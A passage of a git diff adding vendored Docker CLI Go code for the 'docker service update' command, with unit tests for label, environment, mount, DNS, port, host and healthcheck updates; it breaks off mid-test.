return nil +} + +func updateService(flags *pflag.FlagSet, spec *swarm.ServiceSpec) error { + updateString := func(flag string, field *string) { + if flags.Changed(flag) { + *field, _ = flags.GetString(flag) + } + } + + updateInt64Value := func(flag string, field *int64) { + if flags.Changed(flag) { + *field = flags.Lookup(flag).Value.(int64Value).Value() + } + } + + updateFloatValue := func(flag string, field *float32) { + if flags.Changed(flag) { + *field = flags.Lookup(flag).Value.(*floatValue).Value() + } + } + + updateDuration := func(flag string, field *time.Duration) { + if flags.Changed(flag) { + *field, _ = flags.GetDuration(flag) + } + } + + updateDurationOpt := func(flag string, field **time.Duration) { + if flags.Changed(flag) { + val := *flags.Lookup(flag).Value.(*DurationOpt).Value() + *field = &val + } + } + + updateUint64 := func(flag string, field *uint64) { + if flags.Changed(flag) { + *field, _ = flags.GetUint64(flag) + } + } + + updateUint64Opt := func(flag string, field **uint64) { + if flags.Changed(flag) { + val := *flags.Lookup(flag).Value.(*Uint64Opt).Value() + *field = &val + } + } + + cspec := &spec.TaskTemplate.ContainerSpec + task := &spec.TaskTemplate + + taskResources := func() *swarm.ResourceRequirements { + if task.Resources == nil { + task.Resources = &swarm.ResourceRequirements{} + } + return task.Resources + } + + updateLabels(flags, &spec.Labels) + updateContainerLabels(flags, &cspec.Labels) + updateString("image", &cspec.Image) + updateStringToSlice(flags, "args", &cspec.Args) + updateEnvironment(flags, &cspec.Env) + updateString(flagWorkdir, &cspec.Dir) + updateString(flagUser, &cspec.User) + updateString(flagHostname, &cspec.Hostname) + if err := updateMounts(flags, &cspec.Mounts); err != nil { + return err + } + + if flags.Changed(flagLimitCPU) || flags.Changed(flagLimitMemory) { + taskResources().Limits = &swarm.Resources{} + updateInt64Value(flagLimitCPU, &task.Resources.Limits.NanoCPUs) + updateInt64Value(flagLimitMemory, &task.Resources.Limits.MemoryBytes) + } + if flags.Changed(flagReserveCPU) || flags.Changed(flagReserveMemory) { + taskResources().Reservations = &swarm.Resources{} + updateInt64Value(flagReserveCPU, &task.Resources.Reservations.NanoCPUs) + updateInt64Value(flagReserveMemory, &task.Resources.Reservations.MemoryBytes) + } + + updateDurationOpt(flagStopGracePeriod, &cspec.StopGracePeriod) + + if anyChanged(flags, flagRestartCondition, flagRestartDelay, flagRestartMaxAttempts, flagRestartWindow) { + if task.RestartPolicy == nil { + task.RestartPolicy = &swarm.RestartPolicy{} + } + + if flags.Changed(flagRestartCondition) { + value, _ := flags.GetString(flagRestartCondition) + task.RestartPolicy.Condition = swarm.RestartPolicyCondition(value) + } + updateDurationOpt(flagRestartDelay, &task.RestartPolicy.Delay) + updateUint64Opt(flagRestartMaxAttempts, &task.RestartPolicy.MaxAttempts) + updateDurationOpt(flagRestartWindow, &task.RestartPolicy.Window) + } + + if anyChanged(flags, flagConstraintAdd, flagConstraintRemove) { + if task.Placement == nil { + task.Placement = &swarm.Placement{} + } + updatePlacement(flags, task.Placement) + } + + if err := updateReplicas(flags, &spec.Mode); err != nil { + return err + } + + if anyChanged(flags, flagUpdateParallelism, flagUpdateDelay, flagUpdateMonitor, flagUpdateFailureAction, flagUpdateMaxFailureRatio) { + if spec.UpdateConfig == nil { + spec.UpdateConfig = &swarm.UpdateConfig{} + } + updateUint64(flagUpdateParallelism, &spec.UpdateConfig.Parallelism) + updateDuration(flagUpdateDelay, &spec.UpdateConfig.Delay) + updateDuration(flagUpdateMonitor, &spec.UpdateConfig.Monitor) + updateString(flagUpdateFailureAction, &spec.UpdateConfig.FailureAction) + updateFloatValue(flagUpdateMaxFailureRatio, &spec.UpdateConfig.MaxFailureRatio) + } + + if flags.Changed(flagEndpointMode) { + value, _ := flags.GetString(flagEndpointMode) + if spec.EndpointSpec == nil { + spec.EndpointSpec = &swarm.EndpointSpec{} + } + spec.EndpointSpec.Mode = swarm.ResolutionMode(value) + } + + if anyChanged(flags, flagGroupAdd, flagGroupRemove) { + if err := updateGroups(flags, &cspec.Groups); err != nil { + return err + } + } + + if anyChanged(flags, flagPublishAdd, flagPublishRemove) { + if spec.EndpointSpec == nil { + spec.EndpointSpec = &swarm.EndpointSpec{} + } + if err := updatePorts(flags, &spec.EndpointSpec.Ports); err != nil { + return err + } + } + + if anyChanged(flags, flagDNSAdd, flagDNSRemove, flagDNSOptionAdd, flagDNSOptionRemove, flagDNSSearchAdd, flagDNSSearchRemove) { + if cspec.DNSConfig == nil { + cspec.DNSConfig = &swarm.DNSConfig{} + } + if err := updateDNSConfig(flags, &cspec.DNSConfig); err != nil { + return err + } + } + + if anyChanged(flags, flagHostAdd, flagHostRemove) { + if err := updateHosts(flags, &cspec.Hosts); err != nil { + return err + } + } + + if err := updateLogDriver(flags, &spec.TaskTemplate); err != nil { + return err + } + + force, err := flags.GetBool("force") + if err != nil { + return err + } + + if force { + spec.TaskTemplate.ForceUpdate++ + } + + if err := updateHealthcheck(flags, cspec); err != nil { + return err + } + + if flags.Changed(flagTTY) { + tty, err := flags.GetBool(flagTTY) + if err != nil { + return err + } + cspec.TTY = tty + } + + return nil +} + +func updateStringToSlice(flags *pflag.FlagSet, flag string, field *[]string) error { + if !flags.Changed(flag) { + return nil + } + + value, _ := flags.GetString(flag) + valueSlice, err := shlex.Split(value) + *field = valueSlice + return err +} + +func anyChanged(flags *pflag.FlagSet, fields ...string) bool { + for _, flag := range fields { + if flags.Changed(flag) { + return true + } + } + return false +} + +func updatePlacement(flags *pflag.FlagSet, placement *swarm.Placement) { + if flags.Changed(flagConstraintAdd) { + values := flags.Lookup(flagConstraintAdd).Value.(*opts.ListOpts).GetAll() + placement.Constraints = append(placement.Constraints, values...) + } + toRemove := buildToRemoveSet(flags, flagConstraintRemove) + + newConstraints := []string{} + for _, constraint := range placement.Constraints { + if _, exists := toRemove[constraint]; !exists { + newConstraints = append(newConstraints, constraint) + } + } + // Sort so that result is predictable. + sort.Strings(newConstraints) + + placement.Constraints = newConstraints +} + +func updateContainerLabels(flags *pflag.FlagSet, field *map[string]string) { + if flags.Changed(flagContainerLabelAdd) { + if *field == nil { + *field = map[string]string{} + } + + values := flags.Lookup(flagContainerLabelAdd).Value.(*opts.ListOpts).GetAll() + for key, value := range runconfigopts.ConvertKVStringsToMap(values) { + (*field)[key] = value + } + } + + if *field != nil && flags.Changed(flagContainerLabelRemove) { + toRemove := flags.Lookup(flagContainerLabelRemove).Value.(*opts.ListOpts).GetAll() + for _, label := range toRemove { + delete(*field, label) + } + } +} + +func updateLabels(flags *pflag.FlagSet, field *map[string]string) { + if flags.Changed(flagLabelAdd) { + if *field == nil { + *field = map[string]string{} + } + + values := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() + for key, value := range runconfigopts.ConvertKVStringsToMap(values) { + (*field)[key] = value + } + } + + if *field != nil && flags.Changed(flagLabelRemove) { + toRemove := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() + for _, label := range toRemove { + delete(*field, label) + } + } +} + +func updateEnvironment(flags *pflag.FlagSet, field *[]string) { + envSet := map[string]string{} + for _, v := range *field { + envSet[envKey(v)] = v + } + if flags.Changed(flagEnvAdd) { + value := flags.Lookup(flagEnvAdd).Value.(*opts.ListOpts) + for _, v := range value.GetAll() { + envSet[envKey(v)] = v + } + } + + *field = []string{} + for _, v := range envSet { + *field = append(*field, v) + } + + toRemove := buildToRemoveSet(flags, flagEnvRemove) + *field = removeItems(*field, toRemove, envKey) +} + +func getUpdatedSecrets(apiClient client.SecretAPIClient, flags *pflag.FlagSet, secrets []*swarm.SecretReference) ([]*swarm.SecretReference, error) { + if flags.Changed(flagSecretAdd) { + values := flags.Lookup(flagSecretAdd).Value.(*opts.SecretOpt).Value() + + addSecrets, err := ParseSecrets(apiClient, values) + if err != nil { + return nil, err + } + secrets = append(secrets, addSecrets...) + } + toRemove := buildToRemoveSet(flags, flagSecretRemove) + newSecrets := []*swarm.SecretReference{} + for _, secret := range secrets { + if _, exists := toRemove[secret.SecretName]; !exists { + newSecrets = append(newSecrets, secret) + } + } + + return newSecrets, nil +} + +func envKey(value string) string { + kv := strings.SplitN(value, "=", 2) + return kv[0] +} + +func itemKey(value string) string { + return value +} + +func buildToRemoveSet(flags *pflag.FlagSet, flag string) map[string]struct{} { + var empty struct{} + toRemove := make(map[string]struct{}) + + if !flags.Changed(flag) { + return toRemove + } + + toRemoveSlice := flags.Lookup(flag).Value.(*opts.ListOpts).GetAll() + for _, key := range toRemoveSlice { + toRemove[key] = empty + } + return toRemove +} + +func removeItems( + seq []string, + toRemove map[string]struct{}, + keyFunc func(string) string, +) []string { + newSeq := []string{} + for _, item := range seq { + if _, exists := toRemove[keyFunc(item)]; !exists { + newSeq = append(newSeq, item) + } + } + return newSeq +} + +type byMountSource []mounttypes.Mount + +func (m byMountSource) Len() int { return len(m) } +func (m byMountSource) Swap(i, j int) { m[i], m[j] = m[j], m[i] } +func (m byMountSource) Less(i, j int) bool { + a, b := m[i], m[j] + + if a.Source == b.Source { + return a.Target < b.Target + } + + return a.Source < b.Source +} + +func updateMounts(flags *pflag.FlagSet, mounts *[]mounttypes.Mount) error { + + mountsByTarget := map[string]mounttypes.Mount{} + + if flags.Changed(flagMountAdd) { + values := flags.Lookup(flagMountAdd).Value.(*opts.MountOpt).Value() + for _, mount := range values { + if _, ok := mountsByTarget[mount.Target]; ok { + return fmt.Errorf("duplicate mount target") + } + mountsByTarget[mount.Target] = mount + } + } + + // Add old list of mount points minus updated one. + for _, mount := range *mounts { + if _, ok := mountsByTarget[mount.Target]; !ok { + mountsByTarget[mount.Target] = mount + } + } + + newMounts := []mounttypes.Mount{} + + toRemove := buildToRemoveSet(flags, flagMountRemove) + + for _, mount := range mountsByTarget { + if _, exists := toRemove[mount.Target]; !exists { + newMounts = append(newMounts, mount) + } + } + sort.Sort(byMountSource(newMounts)) + *mounts = newMounts + return nil +} + +func updateGroups(flags *pflag.FlagSet, groups *[]string) error { + if flags.Changed(flagGroupAdd) { + values := flags.Lookup(flagGroupAdd).Value.(*opts.ListOpts).GetAll() + *groups = append(*groups, values...) + } + toRemove := buildToRemoveSet(flags, flagGroupRemove) + + newGroups := []string{} + for _, group := range *groups { + if _, exists := toRemove[group]; !exists { + newGroups = append(newGroups, group) + } + } + // Sort so that result is predictable. + sort.Strings(newGroups) + + *groups = newGroups + return nil +} + +func removeDuplicates(entries []string) []string { + hit := map[string]bool{} + newEntries := []string{} + for _, v := range entries { + if !hit[v] { + newEntries = append(newEntries, v) + hit[v] = true + } + } + return newEntries +} + +func updateDNSConfig(flags *pflag.FlagSet, config **swarm.DNSConfig) error { + newConfig := &swarm.DNSConfig{} + + nameservers := (*config).Nameservers + if flags.Changed(flagDNSAdd) { + values := flags.Lookup(flagDNSAdd).Value.(*opts.ListOpts).GetAll() + nameservers = append(nameservers, values...) + } + nameservers = removeDuplicates(nameservers) + toRemove := buildToRemoveSet(flags, flagDNSRemove) + for _, nameserver := range nameservers { + if _, exists := toRemove[nameserver]; !exists { + newConfig.Nameservers = append(newConfig.Nameservers, nameserver) + + } + } + // Sort so that result is predictable. + sort.Strings(newConfig.Nameservers) + + search := (*config).Search + if flags.Changed(flagDNSSearchAdd) { + values := flags.Lookup(flagDNSSearchAdd).Value.(*opts.ListOpts).GetAll() + search = append(search, values...) + } + search = removeDuplicates(search) + toRemove = buildToRemoveSet(flags, flagDNSSearchRemove) + for _, entry := range search { + if _, exists := toRemove[entry]; !exists { + newConfig.Search = append(newConfig.Search, entry) + } + } + // Sort so that result is predictable. + sort.Strings(newConfig.Search) + + options := (*config).Options + if flags.Changed(flagDNSOptionAdd) { + values := flags.Lookup(flagDNSOptionAdd).Value.(*opts.ListOpts).GetAll() + options = append(options, values...) + } + options = removeDuplicates(options) + toRemove = buildToRemoveSet(flags, flagDNSOptionRemove) + for _, option := range options { + if _, exists := toRemove[option]; !exists { + newConfig.Options = append(newConfig.Options, option) + } + } + // Sort so that result is predictable. + sort.Strings(newConfig.Options) + + *config = newConfig + return nil +} + +type byPortConfig []swarm.PortConfig + +func (r byPortConfig) Len() int { return len(r) } +func (r byPortConfig) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byPortConfig) Less(i, j int) bool { + // We convert PortConfig into `port/protocol`, e.g., `80/tcp` + // In updatePorts we already filter out with map so there is duplicate entries + return portConfigToString(&r[i]) < portConfigToString(&r[j]) +} + +func portConfigToString(portConfig *swarm.PortConfig) string { + protocol := portConfig.Protocol + mode := portConfig.PublishMode + return fmt.Sprintf("%v:%v/%s/%s", portConfig.PublishedPort, portConfig.TargetPort, protocol, mode) +} + +// FIXME(vdemeester) port to opts.PortOpt +// This validation is only used for `--publish-rm`. +// The `--publish-rm` takes: +// [/] (e.g., 80, 80/tcp, 53/udp) +func validatePublishRemove(val string) (string, error) { + proto, port := nat.SplitProtoPort(val) + if proto != "tcp" && proto != "udp" { + return "", fmt.Errorf("invalid protocol '%s' for %s", proto, val) + } + if strings.Contains(port, ":") { + return "", fmt.Errorf("invalid port format: '%s', should be [/] (e.g., 80, 80/tcp, 53/udp)", port) + } + if _, err := nat.ParsePort(port); err != nil { + return "", err + } + return val, nil +} + +func updatePorts(flags *pflag.FlagSet, portConfig *[]swarm.PortConfig) error { + // The key of the map is `port/protocol`, e.g., `80/tcp` + portSet := map[string]swarm.PortConfig{} + + // Build the current list of portConfig + for _, entry := range *portConfig { + if _, ok := portSet[portConfigToString(&entry)]; !ok { + portSet[portConfigToString(&entry)] = entry + } + } + + newPorts := []swarm.PortConfig{} + + // Clean current ports + toRemove := flags.Lookup(flagPublishRemove).Value.(*opts.PortOpt).Value() +portLoop: + for _, port := range portSet { + for _, pConfig := range toRemove { + if equalProtocol(port.Protocol, pConfig.Protocol) && + port.TargetPort == pConfig.TargetPort && + equalPublishMode(port.PublishMode, pConfig.PublishMode) { + continue portLoop + } + } + + newPorts = append(newPorts, port) + } + + // Check to see if there are any conflict in flags. + if flags.Changed(flagPublishAdd) { + ports := flags.Lookup(flagPublishAdd).Value.(*opts.PortOpt).Value() + + for _, port := range ports { + if v, ok := portSet[portConfigToString(&port)]; ok { + if v != port { + fmt.Println("v", v) + return fmt.Errorf("conflicting port mapping between %v:%v/%s and %v:%v/%s", port.PublishedPort, port.TargetPort, port.Protocol, v.PublishedPort, v.TargetPort, v.Protocol) + } + continue + } + //portSet[portConfigToString(&port)] = port + newPorts = append(newPorts, port) + } + } + + // Sort the PortConfig to avoid unnecessary updates + sort.Sort(byPortConfig(newPorts)) + *portConfig = newPorts + return nil +} + +func equalProtocol(prot1, prot2 swarm.PortConfigProtocol) bool { + return prot1 == prot2 || + (prot1 == swarm.PortConfigProtocol("") && prot2 == swarm.PortConfigProtocolTCP) || + (prot2 == swarm.PortConfigProtocol("") && prot1 == swarm.PortConfigProtocolTCP) +} + +func equalPublishMode(mode1, mode2 swarm.PortConfigPublishMode) bool { + return mode1 == mode2 || + (mode1 == swarm.PortConfigPublishMode("") && mode2 == swarm.PortConfigPublishModeIngress) || + (mode2 == swarm.PortConfigPublishMode("") && mode1 == swarm.PortConfigPublishModeIngress) +} + +func equalPort(targetPort nat.Port, port swarm.PortConfig) bool { + return (string(port.Protocol) == targetPort.Proto() && + port.TargetPort == uint32(targetPort.Int())) +} + +func updateReplicas(flags *pflag.FlagSet, serviceMode *swarm.ServiceMode) error { + if !flags.Changed(flagReplicas) { + return nil + } + + if serviceMode == nil || serviceMode.Replicated == nil { + return fmt.Errorf("replicas can only be used with replicated mode") + } + serviceMode.Replicated.Replicas = flags.Lookup(flagReplicas).Value.(*Uint64Opt).Value() + return nil +} + +func updateHosts(flags *pflag.FlagSet, hosts *[]string) error { + // Combine existing Hosts (in swarmkit format) with the host to add (convert to swarmkit format) + if flags.Changed(flagHostAdd) { + values := convertExtraHostsToSwarmHosts(flags.Lookup(flagHostAdd).Value.(*opts.ListOpts).GetAll()) + *hosts = append(*hosts, values...) + } + // Remove duplicate + *hosts = removeDuplicates(*hosts) + + keysToRemove := make(map[string]struct{}) + if flags.Changed(flagHostRemove) { + var empty struct{} + extraHostsToRemove := flags.Lookup(flagHostRemove).Value.(*opts.ListOpts).GetAll() + for _, entry := range extraHostsToRemove { + key := strings.SplitN(entry, ":", 2)[0] + keysToRemove[key] = empty + } + } + + newHosts := []string{} + for _, entry := range *hosts { + // Since this is in swarmkit format, we need to find the key, which is canonical_hostname of: + // IP_address canonical_hostname [aliases...] + parts := strings.Fields(entry) + if len(parts) > 1 { + key := parts[1] + if _, exists := keysToRemove[key]; !exists { + newHosts = append(newHosts, entry) + } + } else { + newHosts = append(newHosts, entry) + } + } + + // Sort so that result is predictable. + sort.Strings(newHosts) + + *hosts = newHosts + return nil +} + +// updateLogDriver updates the log driver only if the log driver flag is set. +// All options will be replaced with those provided on the command line. +func updateLogDriver(flags *pflag.FlagSet, taskTemplate *swarm.TaskSpec) error { + if !flags.Changed(flagLogDriver) { + return nil + } + + name, err := flags.GetString(flagLogDriver) + if err != nil { + return err + } + + if name == "" { + return nil + } + + taskTemplate.LogDriver = &swarm.Driver{ + Name: name, + Options: runconfigopts.ConvertKVStringsToMap(flags.Lookup(flagLogOpt).Value.(*opts.ListOpts).GetAll()), + } + + return nil +} + +func updateHealthcheck(flags *pflag.FlagSet, containerSpec *swarm.ContainerSpec) error { + if !anyChanged(flags, flagNoHealthcheck, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { + return nil + } + if containerSpec.Healthcheck == nil { + containerSpec.Healthcheck = &container.HealthConfig{} + } + noHealthcheck, err := flags.GetBool(flagNoHealthcheck) + if err != nil { + return err + } + if noHealthcheck { + if !anyChanged(flags, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { + containerSpec.Healthcheck = &container.HealthConfig{ + Test: []string{"NONE"}, + } + return nil + } + return fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) + } + if len(containerSpec.Healthcheck.Test) > 0 && containerSpec.Healthcheck.Test[0] == "NONE" { + containerSpec.Healthcheck.Test = nil + } + if flags.Changed(flagHealthInterval) { + val := *flags.Lookup(flagHealthInterval).Value.(*PositiveDurationOpt).Value() + containerSpec.Healthcheck.Interval = val + } + if flags.Changed(flagHealthTimeout) { + val := *flags.Lookup(flagHealthTimeout).Value.(*PositiveDurationOpt).Value() + containerSpec.Healthcheck.Timeout = val + } + if flags.Changed(flagHealthRetries) { + containerSpec.Healthcheck.Retries, _ = flags.GetInt(flagHealthRetries) + } + if flags.Changed(flagHealthCmd) { + cmd, _ := flags.GetString(flagHealthCmd) + if cmd != "" { + containerSpec.Healthcheck.Test = []string{"CMD-SHELL", cmd} + } else { + containerSpec.Healthcheck.Test = nil + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/update_test.go b/vendor/github.com/docker/docker/cli/command/service/update_test.go new file mode 100644 index 0000000000..08fe248769 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/update_test.go @@ -0,0 +1,384 @@ +package service + +import ( + "reflect" + "sort" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestUpdateServiceArgs(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("args", "the \"new args\"") + + spec := &swarm.ServiceSpec{} + cspec := &spec.TaskTemplate.ContainerSpec + cspec.Args = []string{"old", "args"} + + updateService(flags, spec) + assert.EqualStringSlice(t, cspec.Args, []string{"the", "new args"}) +} + +func TestUpdateLabels(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("label-add", "toadd=newlabel") + flags.Set("label-rm", "toremove") + + labels := map[string]string{ + "toremove": "thelabeltoremove", + "tokeep": "value", + } + + updateLabels(flags, &labels) + assert.Equal(t, len(labels), 2) + assert.Equal(t, labels["tokeep"], "value") + assert.Equal(t, labels["toadd"], "newlabel") +} + +func TestUpdateLabelsRemoveALabelThatDoesNotExist(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("label-rm", "dne") + + labels := map[string]string{"foo": "theoldlabel"} + updateLabels(flags, &labels) + assert.Equal(t, len(labels), 1) +} + +func TestUpdatePlacement(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("constraint-add", "node=toadd") + flags.Set("constraint-rm", "node!=toremove") + + placement := &swarm.Placement{ + Constraints: []string{"node!=toremove", "container=tokeep"}, + } + + updatePlacement(flags, placement) + assert.Equal(t, len(placement.Constraints), 2) + assert.Equal(t, placement.Constraints[0], "container=tokeep") + assert.Equal(t, placement.Constraints[1], "node=toadd") +} + +func TestUpdateEnvironment(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("env-add", "toadd=newenv") + flags.Set("env-rm", "toremove") + + envs := []string{"toremove=theenvtoremove", "tokeep=value"} + + updateEnvironment(flags, &envs) + assert.Equal(t, len(envs), 2) + // Order has been removed in updateEnvironment (map) + sort.Strings(envs) + assert.Equal(t, envs[0], "toadd=newenv") + assert.Equal(t, envs[1], "tokeep=value") +} + +func TestUpdateEnvironmentWithDuplicateValues(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("env-add", "foo=newenv") + flags.Set("env-add", "foo=dupe") + flags.Set("env-rm", "foo") + + envs := []string{"foo=value"} + + updateEnvironment(flags, &envs) + assert.Equal(t, len(envs), 0) +} + +func TestUpdateEnvironmentWithDuplicateKeys(t *testing.T) { + // Test case for #25404 + flags := newUpdateCommand(nil).Flags() + flags.Set("env-add", "A=b") + + envs := []string{"A=c"} + + updateEnvironment(flags, &envs) + assert.Equal(t, len(envs), 1) + assert.Equal(t, envs[0], "A=b") +} + +func TestUpdateGroups(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("group-add", "wheel") + flags.Set("group-add", "docker") + flags.Set("group-rm", "root") + flags.Set("group-add", "foo") + flags.Set("group-rm", "docker") + + groups := []string{"bar", "root"} + + updateGroups(flags, &groups) + assert.Equal(t, len(groups), 3) + assert.Equal(t, groups[0], "bar") + assert.Equal(t, groups[1], "foo") + assert.Equal(t, groups[2], "wheel") +} + +func TestUpdateDNSConfig(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + + // IPv4, with duplicates + flags.Set("dns-add", "1.1.1.1") + flags.Set("dns-add", "1.1.1.1") + flags.Set("dns-add", "2.2.2.2") + flags.Set("dns-rm", "3.3.3.3") + flags.Set("dns-rm", "2.2.2.2") + // IPv6 + flags.Set("dns-add", "2001:db8:abc8::1") + // Invalid dns record + assert.Error(t, flags.Set("dns-add", "x.y.z.w"), "x.y.z.w is not an ip address") + + // domains with duplicates + flags.Set("dns-search-add", "example.com") + flags.Set("dns-search-add", "example.com") + flags.Set("dns-search-add", "example.org") + flags.Set("dns-search-rm", "example.org") + // Invalid dns search domain + assert.Error(t, flags.Set("dns-search-add", "example$com"), "example$com is not a valid domain") + + flags.Set("dns-option-add", "ndots:9") + flags.Set("dns-option-rm", "timeout:3") + + config := &swarm.DNSConfig{ + Nameservers: []string{"3.3.3.3", "5.5.5.5"}, + Search: []string{"localdomain"}, + Options: []string{"timeout:3"}, + } + + updateDNSConfig(flags, &config) + + assert.Equal(t, len(config.Nameservers), 3) + assert.Equal(t, config.Nameservers[0], "1.1.1.1") + assert.Equal(t, config.Nameservers[1], "2001:db8:abc8::1") + assert.Equal(t, config.Nameservers[2], "5.5.5.5") + + assert.Equal(t, len(config.Search), 2) + assert.Equal(t, config.Search[0], "example.com") + assert.Equal(t, config.Search[1], "localdomain") + + assert.Equal(t, len(config.Options), 1) + assert.Equal(t, config.Options[0], "ndots:9") +} + +func TestUpdateMounts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("mount-add", "type=volume,source=vol2,target=/toadd") + flags.Set("mount-rm", "/toremove") + + mounts := []mounttypes.Mount{ + {Target: "/toremove", Source: "vol1", Type: mounttypes.TypeBind}, + {Target: "/tokeep", Source: "vol3", Type: mounttypes.TypeBind}, + } + + updateMounts(flags, &mounts) + assert.Equal(t, len(mounts), 2) + assert.Equal(t, mounts[0].Target, "/toadd") + assert.Equal(t, mounts[1].Target, "/tokeep") + +} + +func TestUpdateMountsWithDuplicateMounts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("mount-add", "type=volume,source=vol4,target=/toadd") + + mounts := []mounttypes.Mount{ + {Target: "/tokeep1", Source: "vol1", Type: mounttypes.TypeBind}, + {Target: "/toadd", Source: "vol2", Type: mounttypes.TypeBind}, + {Target: "/tokeep2", Source: "vol3", Type: mounttypes.TypeBind}, + } + + updateMounts(flags, &mounts) + assert.Equal(t, len(mounts), 3) + assert.Equal(t, mounts[0].Target, "/tokeep1") + assert.Equal(t, mounts[1].Target, "/tokeep2") + assert.Equal(t, mounts[2].Target, "/toadd") +} + +func TestUpdatePorts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("publish-add", "1000:1000") + flags.Set("publish-rm", "333/udp") + + portConfigs := []swarm.PortConfig{ + {TargetPort: 333, Protocol: swarm.PortConfigProtocolUDP}, + {TargetPort: 555}, + } + + err := updatePorts(flags, &portConfigs) + assert.Equal(t, err, nil) + assert.Equal(t, len(portConfigs), 2) + // Do a sort to have the order (might have changed by map) + targetPorts := []int{int(portConfigs[0].TargetPort), int(portConfigs[1].TargetPort)} + sort.Ints(targetPorts) + assert.Equal(t, targetPorts[0], 555) + assert.Equal(t, targetPorts[1], 1000) +} + +func TestUpdatePortsDuplicate(t *testing.T) { + // Test case for #25375 + flags := newUpdateCommand(nil).Flags() + flags.Set("publish-add", "80:80") + + portConfigs := []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 80, + Protocol: swarm.PortConfigProtocolTCP, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + } + + err := updatePorts(flags, &portConfigs) + assert.Equal(t, err, nil) + assert.Equal(t, len(portConfigs), 1) + assert.Equal(t, portConfigs[0].TargetPort, uint32(80)) +} + +func TestUpdateHealthcheckTable(t *testing.T) { + type test struct { + flags [][2]string + initial *container.HealthConfig + expected *container.HealthConfig + err string + } + testCases := []test{ + { + flags: [][2]string{{"no-healthcheck", "true"}}, + initial: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}, Retries: 10}, + expected: &container.HealthConfig{Test: []string{"NONE"}}, + }, + { + flags: [][2]string{{"health-cmd", "cmd1"}}, + initial: &container.HealthConfig{Test: []string{"NONE"}}, + expected: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}}, + }, + { + flags: [][2]string{{"health-retries", "10"}}, + initial: &container.HealthConfig{Test: []string{"NONE"}}, + expected: &container.HealthConfig{Retries: 10}, + }, + { + flags: [][2]string{{"health-retries", "10"}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, + expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, + }, + { + flags: [][2]string{{"health-interval", "1m"}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, + expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Interval: time.Minute}, + }, + { + flags: [][2]string{{"health-cmd", ""}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, + expected: &container.HealthConfig{Retries: 10}, + }, + { + flags: [][2]string{{"health-retries", "0"}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, + expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, + }, + { + flags: [][2]string{{"health-cmd", "cmd1"}, {"no-healthcheck", "true"}}, + err: "--no-healthcheck conflicts with --health-* options", + }, + { + flags: [][2]string{{"health-interval", "10m"}, {"no-healthcheck", "true"}}, + err: "--no-healthcheck conflicts with --health-* options", + }, + { + flags: [][2]string{{"health-timeout", "1m"}, {"no-healthcheck", "true"}}, + err: "--no-healthcheck conflicts with --health-* options", + }, + } + for i, c := range testCases { + flags := newUpdateCommand(nil).Flags() + for _, flag := range c.flags { + flags.Set(flag[0], flag[1]) + } + cspec := &swarm.ContainerSpec{ + Healthcheck: c.initial, + } + err := updateHealthcheck(flags, cspec) + if c.err != "" { + assert.Error(t, err, c.err) + } else { + assert.NilError(t, err) + if !reflect.DeepEqual(cspec.Healthcheck, c.expected) { + t.Errorf("incorrect result for test %d, expected health config:\n\t%#v\ngot:\n\t%#v", i, c.expected, cspec.Healthcheck) + } + } + } +} + +func TestUpdateHosts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("host-add", "example.net:2.2.2.2") + flags.Set("host-add", "ipv6.net:2001:db8:abc8::1") + // remove with ipv6 should work + flags.Set("host-rm", "example.net:2001:db8:abc8::1") + // just hostname should work as well + flags.Set("host-rm", "example.net") + // bad format error + assert.Error(t, flags.Set("host-add", "$example.com$"), "bad format for add-host:") + + hosts := []string{"1.2.3.4 example.com", "4.3.2.1 example.org", "2001:db8:abc8::1 example.net"} + + updateHosts(flags, &hosts) + assert.Equal(t, len(hosts), 3) + assert.Equal(t, hosts[0], "1.2.3.4 example.com") + assert.Equal(t, hosts[1], "2001:db8:abc8::1 ipv6.net") + assert.Equal(t, hosts[2], "4.3.2.1 example.org") +} + +func TestUpdatePortsRmWithProtocol(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("publish-add", "8081:81") + flags.Set("publish-add", "8082:82") + flags.Set("publish-rm", "80") + flags.Set("publish-rm", "81/tcp") + flags.Set("publish-rm", "82/udp") + + portConfigs := []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 8080, + Protocol: swarm.PortConfigProtocolTCP, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + } + + err := updatePorts(flags, &portConfigs) + assert.Equal(t, err, nil) + assert.Equal(t, len(portConfigs), 2) + assert.Equal(t, 